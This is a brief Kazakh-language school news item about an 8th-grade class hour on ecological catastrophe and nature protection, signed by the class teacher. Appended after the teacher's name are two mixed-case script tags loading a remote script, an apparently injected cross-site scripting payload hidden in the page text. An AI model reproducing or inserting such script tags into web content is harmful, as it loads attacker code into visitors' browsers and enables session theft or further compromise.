Интернеттегі Мектеп платформасындағы 8 «Б» сыныбында «Экологиялық апат алдында» тақырыбында сынып сағаты өткізілді. Мақсаты: балалардың табиғаттағы қатынастар туралы, табиғатты сақтау және оған көмектесу тәсілдері туралы түсініктерін кеңейту; әлемдегі табиғаттың бұзылу фактілерімен таныстыру; экологиялық мәдениет, экологиялық сауаттылық сияқты тұлғалық қасиеттерге жағымды моральдық бағалауды қалыптастыруға ықпал ету; балалардың бойында салауатты өмір салтына деген ұмтылысты, табиғатты қорғау шараларына қатысуға деген құштарлықты ояту. Сынып жетекшісі: Амиржанова К.К.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>